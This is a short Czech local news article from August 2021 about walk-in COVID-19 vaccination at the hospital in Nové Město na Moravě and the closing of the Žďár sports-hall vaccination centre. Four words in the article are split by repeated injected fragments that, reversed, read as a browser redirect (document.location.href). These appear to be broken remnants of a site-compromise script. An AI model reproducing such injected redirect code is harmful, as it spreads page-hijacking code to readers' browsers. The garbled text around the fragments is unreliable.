Rainbow page separator

Očkovat bez registrace se nově lidé mohou i v Novém Městě

Středa, 4. srpna 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Nově také v očkovacím centru v novoměstské nemocnici se lidé mohou i bez registrace nechat očkovat proti onemocnění COVID-19.
„Zde bude prozatím každé úterý očkována dvoudávková vakcína Pfizer/BioNTech,“ informoval náměstek hejtmana Kraje Vysočina pro oblast zdravotnictví Vladimír Novotný. Očkování zájemců bez předchozí registrace je naplánováno na každé úterý v době od 14 do 16 hodin, přičemž vakcinaci mohou pods[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupit osoby starší 16 let věku.
Od září se navíc bude očkovat už jenom v novoměstské nemocnici – očkovací centrum ve žďárské spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní hale na Bouchalkách, které funguje od března a rovněž spadá do organizační gesce nemocnice v Novém Městě, ukončí k poslednímu srpnu provoz. Výhradně v nemocnici jsou už nyní očkovány rovněž děti od dvanácti do patnácti let věku, kterým [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bylo na základě vyhlášené registrace umožněno od začátku prázdnin.